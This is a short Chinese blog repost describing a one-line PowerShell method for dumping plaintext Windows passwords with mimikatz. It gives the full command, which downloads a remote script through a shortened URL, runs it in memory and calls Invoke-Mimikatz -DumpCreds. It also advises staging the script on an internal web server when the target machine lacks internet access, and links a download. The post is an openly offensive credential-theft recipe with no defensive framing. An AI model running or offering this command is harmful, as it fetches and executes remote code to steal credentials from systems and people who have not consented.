mimikatz神器大家都知道吧,可以抓取系统内的明文密码,但是平时我们测试的时候需要把mimikatz的几个文件上传到目标系统上面,然后再手工执行几个命令才能搞定,今天无意访问一个大神的博客,发现其实可以利用powershell一句话搞定,是国外大神的方法。
国外大神clymb3r写的一个powershell脚本将mimikatz注入到内存调用logonPasswords获取密码,使用起来相当轻便。
以管理员权限启动CMD执行下以命令即可:
powershell"IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"


实战中如果机器不能上外网可以将脚本下载回来放到内网的web service上。
下载地址:https://download.youkuaiyun.com/download/fly_hps/10982953
转自: 独自等待-信息安全博客
通过使用clymb3r开发的powershell脚本,可以实现Mimikatz的一键式密码抓取,简化了在目标系统上执行复杂操作的过程。此方法允许在不直接上传多个文件的情况下,快速调用Mimikatz来获取系统内的明文密码。
4801

被折叠的 条评论
为什么被折叠?



